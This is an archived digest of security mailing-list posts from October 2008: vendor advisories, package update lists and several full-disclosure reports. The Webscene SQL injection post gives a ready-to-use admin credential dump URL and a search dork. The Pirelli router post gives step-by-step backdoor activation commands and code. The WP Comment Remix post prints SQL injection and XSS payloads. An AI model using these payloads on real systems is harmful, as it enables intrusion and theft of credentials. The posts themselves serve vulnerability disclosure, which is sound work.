iDefense Security Advisory 10.14.08: Microsoft Host Integration Server 2006 Command Execution Vulnerability

2008-10-14 Thread iDefense Labs 

iDefense Security Advisory 10.14.08
http://labs.idefense.com/intelligence/vulnerabilities/
Oct 14, 2008

I. BACKGROUND

The Host Integration Server is an application suite that is used to
communicate with IBM mainframe servers. One of the components of the
suite is a remote management interface. This interface is implemented
by an RPC server that listens on a dynamic TCP port. The UUID of the
vulnerable RPC service is 'ed6ee250-e0d1-11cf-925a-00aa00c006c1'. For
more information regarding the Host Integration Server, see the
vendor's website found at the following URL.

http://www.microsoft.com/hiserver/default.mspx

II. DESCRIPTION

Remote exploitation of an arbitrary command execution vulnerability in
Microsoft Corp.'s Host Integration Server 2006 could allow an attacker
to execute arbitrary code with the privileges of the affected service.

The RPC interface exposes several methods that an unauthenticated
attacker can use to execute arbitrary programs on the server. RPC
opcodes 1 and 6 both allow an attacker to call the CreateProcess()
function with full control over the application started, as well as the
command line passed to it. This allows an attacker to run arbitrary
programs on the server.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the affected service. The privileges gained
depend on the user account that the Host Integration Server is
configured to use during installation. The service does not require
SYSTEM privileges to run.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Host
Integration Server 2006. Previous versions may also be affected.

V. WORKAROUND

Use the Service Control Manager to disable the SNA RPC service, and
prevent it from starting automatically. This will prevent the
vulnerable service from running, but will also prevent remote
management. Firewalling the TCP port is not a valid workaround, since
the port used for communication is dynamically assigned when the
service starts.

VI. VENDOR RESPONSE

Microsoft has officially addressed this vulnerability with Security
Bulletin MS08-059. For more information, consult their bulletin at the
following URL.

http://www.microsoft.com/technet/security/bulletin/ms08-059.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-3466 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/27/2008  Initial vendor notification.
05/27/2008  Initial vendor response.
10/14/2008  Coordinated public disclosure.

IX. CREDIT

This vulnerability was reported to iDefense by Stephen Fewer of Harmony
Security | (www.harmonysecurity.com ).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events http://labs.idefense.com/

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

[USN-652-1] LittleCMS vulnerability

2008-10-14 Thread Kees Cook 
===
Ubuntu Security Notice USN-652-1   October 14, 2008
lcms vulnerability
CVE-2007-2741
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  liblcms11.13-1ubuntu0.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Chris Evans discovered that certain ICC operations in lcms were not
correctly bounds-checked.  If a user or automated system were tricked
into processing an image with malicious ICC tags, a remote attacker could
crash applications linked against liblcms1, leading to a denial of service,
or possibly execute arbitrary code with user privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.13-1ubuntu0.1.diff.gz
  Size/MD5:13103 4617c440a02960e1f962a88c1c21a9cc
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.13-1ubuntu0.1.dsc
  Size/MD5:  685 507f6385801f19716737a5089d33116d
http://security.ubuntu.com/ubuntu/pool/main/l/lcms/lcms_1.13.orig.tar.gz
  Size/MD5:   585735 e627f43bbbd238895502402d942a6cfd

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.13-1ubuntu0.1_amd64.deb
  Size/MD5:   136682 f085666f76c9bf1a53942baa18b8e052

http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.13-1ubuntu0.1_amd64.deb
  Size/MD5:   129070 e50c4bfb5b0e32ec7f3da1ce9e1ee21f

http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.13-1ubuntu0.1_amd64.deb
  Size/MD5:40296 5c58c601e0d9802394cf25b33319b2c9

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.13-1ubuntu0.1_i386.deb
  Size/MD5:   123518 fd6961be0da7aaf2e2dcb8257d3787da

http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.13-1ubuntu0.1_i386.deb
  Size/MD5:   118222 86dcc1004a11232740c2d6d6903f02a4

http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.13-1ubuntu0.1_i386.deb
  Size/MD5:37112 d4ffa7a920a4e4aba5f8d197d1ad14f0

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.13-1ubuntu0.1_powerpc.deb
  Size/MD5:   130806 3da85714083d3d4f1252ae0b1b1fe6e3

http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.13-1ubuntu0.1_powerpc.deb
  Size/MD5:   131834 38aba2a645449be653dd11be439afcce

http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.13-1ubuntu0.1_powerpc.deb
  Size/MD5:44136 04799ca5393e6acc70592f648b6b846a

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1-dev_1.13-1ubuntu0.1_sparc.deb
  Size/MD5:   133960 ab907a81dcb99819e9d125b76a34742c

http://security.ubuntu.com/ubuntu/pool/main/l/lcms/liblcms1_1.13-1ubuntu0.1_sparc.deb
  Size/MD5:   124964 42864911b8a3f680a7aae8d28701a6c1

http://security.ubuntu.com/ubuntu/pool/universe/l/lcms/liblcms-utils_1.13-1ubuntu0.1_sparc.deb
  Size/MD5:38498 5d040f607c0ec6d411349b0d27b52e73



signature.asc
Description: Digital signature

Webscene eCommerce (level) Remote Sql Injection

2008-10-14 Thread angel 
#

#

#  Webscene eCommerce (level) Remote Sql Injection

#

#  vendor : 
http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm

#

#

#

#

#   Bug Found By :Angela Chang (14-10-2008)

#

#   contact: angel[at]ch4ng.cc

#

#



#

#

#  Greetz: nyubi & Vrs-Chk

#

#

###



vuln file : productlist.php



Input passed to the "level" is not properly verified

before being used. This can be exploited to execute

remote sql injection.



exploit : http://somehost/productlist.php?categoryid=20&level=[sql]

  http://somehost/productlist.php?categoryid=20&level=-4 union select 
concat(loginid,0x2f,password) from adminuser--



Login admin : http://somehost/admin/



 

Google dork : inurl:productlist.php?categoryid= level





   __ _ _  _
__ _  

  __ __ _ / _` |   ___ | |__ _  o O O   __| |_ __ _ 
   _ _ / _` | 

 / _` |  | ' \\__, |  / -_)| |   / _` |o   / _|   | ' \   / _` 
|  | ' \\__, | 

 \__,_|  |_||_|   |___/   \___|   _|_|_  \__,_|   TS__[O]  \__|_  |_||_|  
\__,_|  |_||_|   |___/  

_|"|_|"|_|"|_|"|_|"|_|"| 
{==|_|"|_|"|_|"|_|"|_|"| 

"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'

[SECURITY] [DSA 1654-1] New libxml2 packages fix execution of arbitrary code

2008-10-14 Thread Steve Kemp 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1654-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
October 14, 2008  http://www.debian.org/security/faq
- 

Package: libxml2
Vulnerability  : buffer overflow
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2008-3529
Debian Bug : 498768

It was discovered that libxml2, the GNOME XML library, didn't correctly
handle long entity names.  This could allow the execution of arbitrary
code via a malicious XML file.

For the stable distribution (etch), this problem has been fixed in version
2.6.27.dfsg-5.

For the unstable distribution (sid), this problem has been fixed in
version 2.6.32.dfsg-4.

We recommend that you upgrade your libxml2 package.


Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Source archives:

  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5.diff.gz
Size/MD5 checksum:   220443 48cafbb8d1bd2c6093339fea3f14e4a0
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg.orig.tar.gz
Size/MD5 checksum:  3416175 5ff71b22f6253a6dd9afc1c34778dec3
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5.dsc
Size/MD5 checksum:  893 0dc1f183dd20741e5b4e26a7f8e1c652

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-doc_2.6.27.dfsg-5_all.deb
Size/MD5 checksum:  1328144 c1c5f0ceb391893a94e61c074b677ee9

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_alpha.deb
Size/MD5 checksum:   820850 fac5556241bb0fde20913f25fb9c73ac
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_alpha.deb
Size/MD5 checksum:37980 725b1c6925e610b5843ba0ad554dc7bc
  
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_alpha.deb
Size/MD5 checksum:   184754 5ccbaf07b44dcfe528167074050bf270
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_alpha.deb
Size/MD5 checksum:   916830 17d71480b7e2a447dabde99c11d752fa
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_alpha.deb
Size/MD5 checksum:   881834 cac19a28b37f7afb9e07966f44ddd5b2

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_amd64.deb
Size/MD5 checksum:   184130 a13372752d162d0fb2ccd58da6b73e20
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_amd64.deb
Size/MD5 checksum:36684 8a0265229bebf9245dc7bb7cc6f41d36
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_amd64.deb
Size/MD5 checksum:   796194 6019e59020269cca8fa8fea40f83c118
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_amd64.deb
Size/MD5 checksum:   891922 606fc28448bead2709c39a1d3e529a25
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_amd64.deb
Size/MD5 checksum:   745758 95bd39eb2818772c43c3351b22326fcd

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_arm.deb
Size/MD5 checksum:   741876 1b670c6bac3aa9f7df28f7ea3f1e5725
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_arm.deb
Size/MD5 checksum:34678 9a992dc251b137a919a813eed2af8489
  
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_arm.deb
Size/MD5 checksum:   165290 732b4e94b91a086c6b950d187af160bc
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_arm.deb
Size/MD5 checksum:   817514 299c93a812ac02a8aa9da88f4cb5aedf
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_arm.deb
Size/MD5 checksum:   673192 d2ff2c26ee8dae05f81c24aa6dfce9b5

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_hppa.deb
Size/MD5 checksum:   191876 4d2e33090237b47bc10e9526329f0bc5
  
http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-

[USN-653-1] D-Bus vulnerabilities

2008-10-14 Thread Kees Cook 
===
Ubuntu Security Notice USN-653-1   October 14, 2008
dbus vulnerabilities
CVE-2008-0595, CVE-2008-3834
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libdbus-1-2 0.60-6ubuntu8.3

Ubuntu 7.04:
  libdbus-1-3 1.0.2-1ubuntu4.2

Ubuntu 7.10:
  libdbus-1-3 1.1.1-3ubuntu4.2

Ubuntu 8.04 LTS:
  libdbus-1-3 1.1.20-1ubuntu3.1

After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

Details follow:

Havoc Pennington discovered that the D-Bus daemon did not correctly
validate certain security policies.  If a local user sent a specially
crafted D-Bus request, they could bypass security policies that had a
"send_interface" defined. (CVE-2008-0595)

It was discovered that the D-Bus library did not correctly validate
certain corrupted signatures.  If a local user sent a specially crafted
D-Bus request, they could crash applications linked against the D-Bus
library, leading to a denial of service. (CVE-2008-3834)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus_0.60-6ubuntu8.3.diff.gz
  Size/MD5:   101072 91db84be3ea61eff0348fc42600fa597
http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus_0.60-6ubuntu8.3.dsc
  Size/MD5: 1172 7bf2e49310068b1302d60e231ebd0878
http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus_0.60.orig.tar.gz
  Size/MD5:  1674899 da9561b5e579cedddc34f53427e99a93

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus-1-doc_0.60-6ubuntu8.3_all.deb
  Size/MD5:  1655972 ef345c4b84a966586b31604caf62742c

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-cil_0.60-6ubuntu8.3_all.deb
  Size/MD5:   188332 3955ccbcfdec107796c969ec2d60e455

http://security.ubuntu.com/ubuntu/pool/universe/d/dbus/monodoc-dbus-1-manual_0.60-6ubuntu8.3_all.deb
  Size/MD5:   179500 44024ceebfad7ee32cf4847ceb6b3a71

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus-1-utils_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   174908 ab9ed41b239f04c6b82e9197c1408a38

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   355310 ded0be33cf24d3a21af2d55b8638a42e

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-2_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   265188 56f5086e786f651384bbb780acae9dd2

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-dev_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   329094 1d27f1fc99baa126c26ff9168e885cc5

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-glib-1-2_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   199644 9c14e1470d73c46cabff3053a42e78eb

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-glib-1-dev_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   242656 41fbcad27a6c45cf68b3d7b178218a4e

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-qt-1-1c2_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   173358 bb279da93ccc27e9a64cd57ea1e18817

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-qt-1-dev_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   178754 98c5ca22fbf92760346112dca78cfe0c

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/python2.4-dbus_0.60-6ubuntu8.3_amd64.deb
  Size/MD5:   284604 71c38fb8e22faa11ca9ca5e7f1fa501b

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus-1-utils_0.60-6ubuntu8.3_i386.deb
  Size/MD5:   171382 a177f78f62fc121028276d9d02ea3e3b

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/dbus_0.60-6ubuntu8.3_i386.deb
  Size/MD5:   324652 c40bd701686fe1c80e8ddd43039b6740

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-2_0.60-6ubuntu8.3_i386.deb
  Size/MD5:   246972 a6d76f44725163f972ecd4aba36ff3b0

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-1-dev_0.60-6ubuntu8.3_i386.deb
  Size/MD5:   296248 28a5e2b0b3bf2096cf3eeaaffca366b9

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-glib-1-2_0.60-6ubuntu8.3_i386.deb
  Size/MD5:   191726 1cedfbbd185b496d275935fa72a2d12a

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-glib-1-dev_0.60-6ubuntu8.3_i386.deb
  Size/MD5:   226512 90777a6ce67e4b3add23263b57ef089d

http://security.ubuntu.com/ubuntu/pool/main/d/dbus/libdbus-qt-1-1c2_0.60-6ubuntu8.3_i386.deb
  Size/MD5:   172326 c0db53b6ce9137d38cdeb2552d0f9931

http://security.ub

Telecom Italia Alice Pirelli routers backdoor discoverd to activate telnet/ftp/tftp from internal LAN/WLAN.

2008-10-14 Thread drpepppperone 
#

saxdax & drpepperONE


Discovered embedded backdoor to activate telnet/ftp/tftp/web extended admin 
interface
with Admin privileges, from internal network lan on Alice ADSL CPE 
Modem/Router, manufactered
by Pirelli based on Broadcom platform.

#

saxdax & drpepperONE

Router Vendor:  Alice Telecom Italia CPE Modem/Routers manufactered by 
Pirelli
based on Broadcom platform.

Model Affected: AGA[Alice Gate2 plus Wi-Fi]/AGB[Alice Gate2 plus]
AG2P-AG3[Alice Gate W2+]/AGPV-AGPF[Alice Gate 
VoIP 2 Plus Wi-Fi]

Firmware Version:   All AGA/AGB/AG2P-AG3/AGPV-AGPF firmware version 
are affected.

Platforms:  Customized Linux version 2.6.8.1 on Broadcom BCM96348 
chipset.

Vulnerability:  enable telnet/ftp/tftp and web-admin from internal lan. 


Exploitation:   internal network lan, versus Router 

Date:   13 Oct 2008

Authors:saxdax & drpepperONE

e-mail: [EMAIL PROTECTED]   [EMAIL 
PROTECTED]

Risk:   medium>low

#

1) Introduction
2) Vulnerability
3) The Exploit
4) The Code
5) Fix

#

===
1) Introduction
===

Telecom Italia is the most important Italian ISP offering an ADSL service named 
"Alice".
Telecom Italia rent out with "Alice Adsl" service, different CPE Modem/Router 
among which 
the affected ones.
The interface to configure these modems are made extremily poor by the provider 
to ensure
more control.
There's no way to enable telnet, ftp, tftp or more advanced web pages from the 
web interface.

http://www.telecomitalia.com/
http://adsl.alice.it/

#


2) Vulnerability


An attacker can activate and get unauthorized access to the routers 
administration
interface and telnet/ftp/tftp services from internal network.

Every user in the LAN (or Wireless LAN) can nevertheless have access to the 
routers
administration interface and telnet/ftp/tftp!

If an attacker can get access to the administrator interface and login, he has 
full control
over the routers configuration.

#


==
3) The Exploit
==

To enable telnet/ftp/tftp and web-admin interface it is necessary send a special
IP packet to router specific ip 192.168.1.1.
This works only from internal LAN where an attacker have and ip like 
192.168.1.XX.
The ip packet send to router must have the following feature:

1)IP-protocol-number 255 (there's a RAW SOCKET listening on the router)
2)Payload size 8 byte
3)The payload are the first 8 byte of a salted md5 of the mac address of device 
br0
4)br0 in these modems has the same mac of eth0

When the modem receives the packet all services will be enabled.


Example:


>From a GNU/LINUX distrib:

1)Retrieve br0 maccaddress:

arping -I eth0 -c 2 192.168.1.1

ARPING 192.168.1.1 from 192.168.1.2 eth0
Unicast reply from 192.168.1.1 [00:01:02:03:04:05]  8.419ms
Unicast reply from 192.168.1.1 [00:01:02:03:04:05]  2.095ms
Sent 2 probes (1 broadcast(s))
Received 2 response(s)


2)Calculate special md5 hash from br0 macaddress: create an hex 6 byte long 
file with the mac address.
run the application below and copy the output hash.
http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html

3)Send ip packet to router ip 192.168.1.1 with 8 byte paylod file (with the 
tool you like)

i.e.: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex


4)Telnet to router :

telnet 192.168.1.1

BCM96348 ADSL Router
Login: admin
Password: 



#


===
4) The Code
===

/* Alice Backdoor Pwd creator by saxdax */
/* this code generates an 8 byte hash to use as the paylod of the ip packet   */
/* the mac must be in an hex file and has to be passed as argument to the 
program */

#include 
#include 
#include 
#include "md5.h"


/*
 *  RFC 1321 compliant MD5 implementation
 *
 *  Copyright (C) 2001-2003  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *

WP Comment Remix 1.4.3 Multiple Vulnerabilities

2008-10-14 Thread g30rg3_x 
___
ChX Security |
Advisory #3   |
==

->"WP Comment Remix 1.4.3 Multiple Vulnerabilities"<-

_
Advisory Information |
===
Title: WP Comment Remix 1.4.3 Multiple Vulnerabilities
Author: g30rg3_x 
Advisory URL: http://chxsecurity.org/advisories/adv-3-full.txt
Date of last update: 2008-10-13
CVE Name: --


Vulnerability Information |
==
Software: WP Comment Remix
Version: 1.4.3
From: Remote
Severity: Extremely Critical
Impact:
Manipulation of data
Cross-Site Scripting
Type of Advisory: Full Disclosure

_
Software Description |
===
WP Comment Remix adds a plethora of new options and features to
Wordpress. From Reply and Quote links
for commenters, to a full upgrade to the edit comments pages in the
admin panel, WPCR will save you
time and effort when running your blog.


Vulnerability Description |
==
WP Comment Remix has multiple vulnerabilities which allow remote
attackers to conduct SQL Injection,
Cross-Site Scripting and Cross-Site Request Forgery attacks.
The SQL Injection is possible due to lack of filtration on the comment
post ID variable in the AJAX
Comments script.
The Cross-Site Scripting is possible due to lack of filtration and
escaping on several stored
options.
The Cross-Site Request Forgery is caused by the lack of the WordPress
Nonces on the options panel form.

__
Technical Description |

* SQL Injection *
Inside the script "ajax_comments.php" (around lines 27 to 29):

/-
$id = $_GET['p'];

$comments = $wpdb->get_results("SELECT * FROM $wpdb->comments WHERE
comment_post_ID = $id AND comment_approved != 'spam' ORDER BY
comment_date DESC");
--/
As you can see in the presented code, the value of $id is taken from
HTTP GET p variable and then $id is later used
inside the SQL Query of get_results method from the $wpdb object
(which allow WordPress plugins developers to pull
multiple row results from the database), so we can inject SQL code and
the data will later be show as comment data
on the script.

As and a example we can inject something like this:
/--
ajax_comments.php?p=0 UNION SELECT
1,2,user(),4,5,6,7,8,CONCAT(database(),0x3C62723E,version()),10,11,12,13,14,15
--
---/
To obtain the MySQL user, Database name and MySQL version used on the server.



* Cross-Site Scripting *
Inside the script "wpcommentremix.php" (around lines 611 to 781)

(The next code is truncated to only show the vulnerable parts of the code)
/--
$options['replytotext'] = $_POST['replytotext'];
...
$options['quotetext'] = $_POST['quotetext'];
$options['originallypostedby'] = $_POST['originallypostedby'];
$options['sep'] = $_POST['sep'];
$options['maxtags'] = $_POST['maxtags'];
...
$options['tagsep'] = $_POST['tagsep'];
$options['tagheadersep'] = $_POST['tagheadersep'];
$options['taglabel'] = $_POST['taglabel'];
$options['tagheaderlabel'] = $_POST['tagheaderlabel'];
...

...

...
' />
...

...

...

...

...

...

---/
This variables totally lack of filtration and escaping so if we store
something like this...

/--
5">alert(String.fromCharCode(88,83,83));http://chxsecurity.org/proof-of-concepts/wp-comment-remix-143.zip

___
Solution |
==
Upgrade to version 1.4.4

___
Timeline |
===
Bug Found: 16/09/2008
Vendor Contact: 20/09/2008
Vendor Response: 23/09/2008
Public Disclosure: 13/10/2008


ChX Security
   http://chxsecurity.org/
 (c) 2008

--
Original: http://chxsecurity.org/advisories/adv-3-full.txt

[RISE-2008001] Sun Solstice AdminSuite sadmind adm_build_path() Buffer Overflow Vulnerability

2008-10-14 Thread RISE Security 
RISE-2008001
Sun Solstice AdminSuite sadmind adm_build_path() Buffer Overflow Vulnerability

http://risesecurity.org/advisories/RISE-2008001.txt
Published: October 14, 2008
Updated: October 14, 2008

INTRODUCTION

There exists a vulnerability within a function of the Sun Solstice AdminSuite 
sadmind, which when properly exploited can lead to remote compromise of the 
vulnerable system.
This vulnerability was confirmed by us in the following versions of the Sun 
operating system, other versions may be also affected.

Sun Solaris 9 SPARC
Sun Solaris 9 x86
Sun Solaris 8 SPARC
Sun Solaris 8 x86

DETAILS

Solstice AdminSuite is a collection of graphical user interface tools and 
commands used to perform administrative tasks such as managing users, groups, 
hosts, system files, printers, disks, file systems, terminals, and modems.

The distributed system administration daemon (sadmind) is the daemon used by 
Solstice AdminSuite applications to perform distributed system administration 
operations.

The sadmind daemon is started automatically by the inetd daemon whenever a 
request to invoke an operation is received. The sadmind daemon process 
continues to run for 15 minutes after the last request is completed, unless a 
different idle-time is specified with the -i command line option. The sadmind 
daemon may be started independently from the command line, for example, at 
system boot time. In this case, the -i option has no effect; sadmind continues 
to run, even if there are no active requests.

The vulnerable function adm_build_path() does does not validate user supplied 
data when appending it to a stack-based buffer using strcat(), resulting in a 
stack-based buffer overflow. The exploitation of this vulnerability is trivial 
and results in remote compromise of the vulnerable system.
This is the debug information about this vulnerability (from Sun Solaris 9 x86).


Breakpoint 1, 0xd330e5b0 in adm_build_path ()
   from /usr/snadm/lib/libadmapm.so.2
(gdb) until *adm_build_path+38
0xd330e5c6 in adm_build_path () from /usr/snadm/lib/libadmapm.so.2
(gdb) x/i $pc 
0xd330e5c6 : call   0xd3304fa8 <[EMAIL PROTECTED]>
(gdb) x/x $esp+4
0x80411e4:  0x080b7cd0
(gdb) x/x $esp  
0x80411e0:  0x08041208
(gdb) x/s 0x080b7cd0
0x80b7cd0:   'A' ...
(gdb) x/s 0x08041208
0x8041208:   "system.2.1/"
(gdb) where
#0  0xd330e5c6 in adm_build_path () from /usr/snadm/lib/libadmapm.so.2
#1  0xd330eaa7 in adm_find_method () from /usr/snadm/lib/libadmapm.so.2
#2  0xd335326b in verify_vers_1 () from /usr/snadm/lib/libadmagt.so.2
#3  0xd3352e88 in verify_validate () from /usr/snadm/lib/libadmagt.so.2
#4  0xd3352cf8 in amsl_verify () from /usr/snadm/lib/libadmagt.so.2
#5  0xd32c8a85 in __0fQNetmgtDispatcherPdispatchRequestP6Hsvc_reqP6J__svcxprt
() from /usr/snadm/lib/libadmcom.so.2
#6  0xd32c8656 in __0fQNetmgtDispatcherOreceiveRequestP6Hsvc_reqP6J__svcxprt ()
   from /usr/snadm/lib/libadmcom.so.2
#7  0xd32c837c in _netmgt_receiveRequest () from /usr/snadm/lib/libadmcom.so.2
#8  0xd311d4a3 in _svc_prog_dispatch () from /usr/lib/libnsl.so.1
#9  0xd311d24e in svc_getreq_common () from /usr/lib/libnsl.so.1
#10 0xd311d130 in svc_getreq_poll () from /usr/lib/libnsl.so.1
#11 0xd3121550 in _svc_run () from /usr/lib/libnsl.so.1
#12 0xd3121293 in svc_run () from /usr/lib/libnsl.so.1
#13 0xd32cd165 in __0fQNetmgtDispatcherNstartupServerv ()
   from /usr/snadm/lib/libadmcom.so.2
#14 0xd32cd13b in netmgt_start_agent () from /usr/snadm/lib/libadmcom.so.2
#15 0x0805168f in main ()
(gdb) stepi
0xd3304fa8 in [EMAIL PROTECTED] () from /usr/snadm/lib/libadmapm.so.2
(gdb) step
Single stepping until exit from function [EMAIL PROTECTED], 
which has no line number information.
0xd330e5cb in adm_build_path () from /usr/snadm/lib/libadmapm.so.2
(gdb) x/i $pc
0xd330e5cb : add$0x8,%esp
(gdb) where
#0  0xd330e5cb in adm_build_path () from /usr/snadm/lib/libadmapm.so.2
#1  0xd330eaa7 in adm_find_method () from /usr/snadm/lib/libadmapm.so.2
#2  0xaabbccdd in ?? ()
#3  0x08063000 in ?? ()
#4  0x08063128 in ?? ()
#5  0x080b7cd0 in ?? ()
#6  0x08041730 in ?? ()
#7  0x0400 in ?? ()
#8  0x0001 in ?? ()
#9  0xd336ac8c in ?? () from /usr/snadm/lib/libadmagt.so.2
#10 0x in ?? ()
(gdb) c
Continuing.

Breakpoint 1, 0xd330e5b0 in adm_build_path ()
   from /usr/snadm/lib/libadmapm.so.2
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xaabbccdd in ?? ()
(gdb) 


A proof of concept code for this vulnerability can be downloaded from our 
website http://risesecurity.org/.

VENDOR

Sun Security Coordination Team was notified of this issue, proper corrections
should be available soon. Meanwhile, we recommend disabling the distributed
system administration daemon (sadmind).

CREDITS

This vulnerability was discovered by Adriano Lima <[EMAIL PROTECTED]>.

DISCLAIMER

